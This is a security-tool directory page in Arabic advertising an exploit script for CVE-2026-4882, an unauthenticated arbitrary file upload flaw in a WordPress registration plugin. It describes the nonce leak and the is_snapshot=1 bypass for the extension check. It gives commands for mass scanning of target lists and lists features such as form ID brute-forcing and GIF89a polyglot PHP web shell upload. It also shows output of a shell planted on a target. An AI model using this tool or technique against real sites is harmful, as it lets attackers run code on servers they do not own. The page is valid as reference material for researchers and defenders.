Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - رفع ملفات تعسفي دون مصادقة | Kitploit
أدوات/GitHubGitHub/xshadow-here/cve-2026-4882
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - رفع ملفات تعسفي دون مصادقة

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - رفع ملف تعسفي بدون مصادقة

الوصف :

User Registration Advanced Fields <= 1.6.20 - رفع ملف تعسفي بدون مصادقة الوصف إن إضافة User Registration Advanced Fields لووردبريس (الإصدارات حتى 1.6.20) معرضة لثغرة رفع ملفات تعسفي بدون مصادقة عبر إجراء AJAX uraf_profile_picture_upload_method_upload. تقوم الإضافة بتسريب nonce صالح عبر wp_localize_script() في أي صفحة تحتوي على نموذج تسجيل، كما أن استخدام المعامل is_snapshot=1 يتجاوز التحقق من امتداد الملف بالكامل. وهذا يسمح للمهاجمين غير المصادق عليهم برفع ملفات تعسفية (مثل قذائف PHP ويب مقنعة كصور GIF)، والتي تُخزَّن في wp-content/uploads/user_registration_uploads/temp-uploads/، مما يؤدي إلى تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE).

معلومات : CVE-2026-4882

~ درجة CVSS: 9.8 (حرجة)

~ الإصدارات المتأثرة: <= 1.6.20

  • الباحث : 0xd4rk5id3 - EnvoraSec

الاستخدام :

هدف واحد :

  • python3 shadow.py -u https://target.com -s shadow.php

أهداف متعددة :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

الوضع التفاعلي :

  • python3 shadow.py
  • إدخال اسم ملف الأهداف
  • إدخال عدد الخيوط 1-50 كحد أقصى

الميزات :

  • تعدد الخيوط (Multi-threading)
  • معالجة الأخطاء (Error Handling)
  • اكتشاف تلقائي للـ Nonce ومعرف النموذج (Form ID)
  • زحف على الصفحة الرئيسية وملف Sitemap (مسارات تسجيل مخصصة)
  • احتياطي تخمين معرف النموذج (Brute Force Form ID Fallback)
  • حل تلقائي لإعادة توجيه HTTP/HTTPS (Auto HTTP/HTTPS Redirect Resolve)
  • رفع قشرة متعددة اللغات GIF89a (GIF89a Polyglot Shell Upload)
  • قشرة تحقق (Verification Shell)
  • حفظ تلقائي للنتائج في shell.txt

المخرجات :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

إخلاء مسؤولية :

هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان فقط.

الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها يعد غير قانوني.

تنزيل الأداة